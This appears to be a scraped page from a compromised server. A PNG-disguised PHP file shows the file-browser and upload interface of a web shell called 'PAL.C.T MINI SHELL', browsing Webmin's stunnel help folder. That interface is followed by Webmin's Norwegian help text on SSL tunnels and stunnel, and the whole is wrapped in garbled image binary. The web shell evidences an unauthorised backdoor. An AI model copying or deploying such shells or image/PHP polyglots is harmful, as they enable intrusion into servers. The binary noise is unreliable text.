php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.no.auto.html

<header> Introduksjon til SSL-tunneler </header> SSL er en protokoll for kryptering av data i en TCP-forbindelse når den reiser over nettverket. Den ble opprinnelig utviklet for å beskytte trafikken mellom nettlesere og servere, men kan brukes til å kryptere alle slags datastrømmer som normalt vil bli sendt via TCP-protokollen. <p> SSL-protokollen lar klienter og servere autentisere seg til hverandre, slik at en klient kan være sikker på at den virkelig kobler seg til verten den tror den er. Dette gjøres ved å bruke sertifikater som er utstedt av en sertifikatmyndighet som er anerkjent av klienten (slik at de kan verifiseres) og assosieres med et bestemt vertsnavn. Uten sertifikater kan en angriper dirigere en SSL-forbindelse til sin egen server og fange sensitiv informasjon fra en klient som tror den snakker med den virkelige serveren. <p> Alle data som reiser kryptert over Internett, kan fanges opp og leses av en angriper med tilgang til et av nettverkene den går gjennom. Selv data som reiser mellom en klient og et serversystem på et LAN, kan lett høres på. Når du kobler til en telnet-, FTP- eller POP3-server, blir passordet ditt sendt over nettverket og dermed kan fanges opp av en angriper. <p> SSL kan brukes til å beskytte data i slike situasjoner, men bare hvis både klienten og serveren støtter dem. De fleste nettlesere og e-postklienter kan opprette SSL-kryptert HTTP-, POP3- og IMAP-tilkoblinger, men ikke alle web- og POP3-servere kan godta dem. Spesielt POP3 er vanskelig å beskytte, fordi standardserveren som følger med de fleste Unix-systemer ikke støtter SSL i det hele tatt. Heldigvis selv om det er en løsning - stunnel. <p> STunnel er et enkelt program som konverterer en ikke-kryptert forbindelse til en SSL-kryptert. Det er vanligvis satt opp for å bli kjørt fra en superserver som inetd eller xinetd, og deretter kjøre et annet program som POP3-serveren som ikke støtter SSL. Denne utformingen gjør det mulig å beskytte servere som normalt kjøres fra inetd, for eksempel telnet-, NNTP- og IMAP-servere. <p> Ikke alle servere kan imidlertid beskyttes med kryptering, fordi det ikke eksisterer noen klient som bruker dem i SSL-modus. For eksempel har jeg aldri hørt om en telnet- eller FTP-klient som kan bruke SSL, fordi den vanlige SSH-pakken allerede tillater kryptert ekstern pålogging og filoverføring. <p> Denne Webmin-modulen gjør det enkelt å sette opp supertjenertjenester som kjører STunnel for å starte et serverprogram. Selv om dette kan gjøres manuelt ved å bruke Internet Services-modulen, er denne spesielt utviklet for å sette opp og konfigurere STunnel. Den oppdager automatisk om du har installert inetd og / eller xinetd, leser konfigurasjonene deres for å se etter eksisterende SSL-tunneler og legger til dem når du oppretter en ny tunnel. Hvis begge er installert, blir nye SSL-tunneler lagt til xinetd-konfigurasjonen, da det er den overordnede av de to etter min mening. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`